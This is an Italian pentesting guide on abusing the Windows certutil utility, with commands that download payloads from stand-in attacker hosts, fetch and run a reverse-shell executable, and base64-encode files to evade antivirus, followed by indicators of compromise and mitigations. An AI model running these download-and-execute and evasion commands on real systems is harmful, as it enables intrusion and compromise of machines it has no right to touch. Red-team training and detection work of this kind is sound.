Guida Approfondita su `certutil`
Certutil è un utility CLI inclusa di default nei sistemi Windows. Originariamente progettata per la gestione dei certificati digitali, è divenuta un tool comunemente abusato in ambito post-exploitatio
Guida Approfondita su certutil
Introduzione
Certutil è un utility CLI inclusa di default nei sistemi Windows. Originariamente progettata per la gestione dei certificati digitali, è divenuta un tool comunemente abusato in ambito post-exploitation e red teaming, grazie alla sua capacità di effettuare encoding, decoding, download di file e gestione del certificato tramite comandi nativi.
Use Case in Ambito Pentesting
In scenari offensivi, certutil può essere utilizzato per:
- Scaricare file da Internet.
- Decodificare file in base64.
- Copiare/eseguire payload da remoto aggirando alcuni controlli di sicurezza.
- Eseguire trasferimenti file senza strumenti esterni.
Sintassi Generale
certutil [OPTIONS] -addstore/-decode/-encode/-urlcache/etc.Comandi Utili
1. Download di un file da URL remota
certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe-urlcache: Utilizza la cache dei file scaricati.
-split: Gestisce file grandi segmentandoli.
-f: Forza il download anche se il file esiste.
💡 Utilizzato spesso per il download di malware/payload su target compromessi.
2. Encoding in base64
certutil -encode input.exe output.b643. Decoding da base64
certutil -decode input.b64 output.exe4. Visualizzazione file in formato esadecimale
certutil -dump file.exe5. Creazione di certificati (uso legittimo)
certutil -store myEsempi Pratici di Abuso
Esecuzione di un reverse shell
1. Attacker:
python3 -m http.server 802. Victim:
certutil -urlcache -split -f http://ATTACKER_IP/reverse.exe reverse.exe
reverse.exeEvitare il rilevamento AV
- Base64 encode lato attaccante:
certutil -encode revshell.exe revshell.b64- Decodifica lato target:
certutil -decode revshell.b64 revshell.exeIndicatori di Compromissione (IoC)
- Utilizzo anomalo di
certutilda utenti non amministratori.
- Connessioni HTTP non usuali da host interni.
- File
.exeo.dllscritti dacertutil.exein percorsi temporanei o sospetti.
Mitigazioni
- Monitorare l’uso di
certutil.exetramite Windows Event Logging.
- Limitare l’accesso a
certutil.exetramite AppLocker o Software Restriction Policies.
- Utilizzare EDR con capacità di rilevamento comportamentale (es. download da tool di sistema).
Conclusione
certutil è un esempio perfetto di come tool legittimi possano essere facilmente weaponizzati. La sua presenza nativa in tutti i sistemi Windows lo rende un'arma formidabile per attori malevoli. Ogni blue team dovrebbe implementare regole di monitoraggio per intercettarne l'uso sospetto.